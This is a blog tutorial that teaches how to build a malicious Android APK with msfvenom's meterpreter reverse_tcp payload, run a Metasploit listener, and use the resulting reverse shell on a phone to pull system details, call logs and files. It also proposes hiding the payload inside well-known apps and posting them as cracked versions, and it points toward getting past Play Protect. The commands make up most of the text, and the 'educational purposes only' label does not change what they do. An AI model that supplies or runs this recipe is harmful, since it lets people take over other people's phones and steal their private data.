Open in app

Sign in

Write

Sign in

How to hack any Android Device?

The Beginners Way

Sumanth Dodda
5 min readJun 19, 2021

So basically, there are many ways to hack an android device and there are many types of malware that one can actually gain access to, and some of them are using spyware apps like spyzier[Github], and also one can actually bind some form of application code with some well-known apps and release apks online as cracked versions[Mods].

As a beginner, we will create a small apk[payload] and install this apk in our local network environment[i.e within in the wifi network] and we will also deal with basic usage of the powerful tool which can be used by cybercriminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers known as Metasploit

Tools required:

  • An Android Device
  • Metasploit Framework[Preinstalled in Kali]

Step 1: Generate a payload

So there is an inbuilt payload generator within the framework itself so we will be using:

msfvenom –p android/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port Numbert> R > cybermight.apk

We can see my IP address as 192.168.1.5

And in here we will be configuring the payload to connect back using the reverse TCP method as soon the victim installs and opens the installed apk we will be getting a command and control shell and for this, we need to configure a listener on the attacker machine LHOST and LPORT are the listener configurations and which actively listens for the incoming connections all the time, So before the victim clicks we need to be ready with our listener for the incoming connection.

ls command confirms that a file called “cybermight.apk” has been created

-p: Specify Payload type [There are many available to create a reverse connection, but reverve_tcp is the most reliable and the famous payload]
• LHOST: Your Listener Address [i.e Attacker IP address]
• LPORT : Listening Port number [Some Random Port Number]
• R: RAW Format [apk format]
• ><filename>.apk [Location to save the payload]

Step 2: Configuring our listener

We will be using the Metasploit framework to listen for the incoming connections, so the command msfconsole starts the framework.

You can search for the payloads available for android in the Metasploit framework by typing in “search android”

We will be using payload number 20 [reverse_tcp]

Please type in the following command and we will explain this later

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST <ip address given> [set LHOST 192.168.1.5]
  • set LPORT <port number given> [set LHOST 1906]
  • show options
  • exploit

So multi/handler is an option that handles exploits launched outside of the framework. and the payload we used needs to be given to the set payload option and the configuration of LHOST and LPORT will start the listening by using them and show options will give you the summary of the options you configured and the exploit option is to start our listener right away

Listener started

Step 3: Installation of payload

So I copied the apk manually and installed it on my own device.

You may face an error as shown below and you may also face an error stating that malicious activity or signature found and we will discuss later for now just click install anyway

And after installation, you may see an app called “Main Activity” in your home section

And as soon as you open the application you may see something like this and after allowing it, the app closes automatically and won't give or respond to your input

Step 4: Listener Session

But in the attacker machine, a reverse shell will be created where the attacker will have control over your device

My phone IP address is 192.168.1.3

And the help command will give you the options that you can actually perform gather some serious information from this CLI

Examples:

  • sysinfo : will dump all the architecture information of the device
  • dump_calllog : will fetch all your call logs and saves them locally on the attacker PC
  • ls: will list the files in the directory present on the android device

Blocked By Play Protect

So this is the point where one has to learn and bypass the detection and to bypass them we need to actually sign the apk and there are many tools to do this but I am leaving this to you, try to understand how and why it works. and also how to perform such type of attack outside the network?

Conclusion

So as discussed one can actually bind this payload into a well-known working application and host the apk online in the name of cracked versions. And this is a general and basic process that one can actually perform on windows, Linux, etc the process may vary, but the basic idea sticks on, the changes are like for a Windows machine you have to create a .exe payload, and Metasploit is a great tool and this can also be used to deliver some serious attacks on unpatched servers and you can actually automate the whole process we discussed here with some Github scripts like the FATRat and many more, but still learning how and why this works is a must.

Note: For Educational Purposes Only

Thanks,

Cybermight

Do follow on Instagram for more content
Androidhacking
Cybersecurity
Hacking
Metasploit
Instagram

--

--

Sumanth Dodda

Written by Sumanth Dodda

32 Followers

I will be talking about cybersecurity, DevOps, Cloud Computing

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams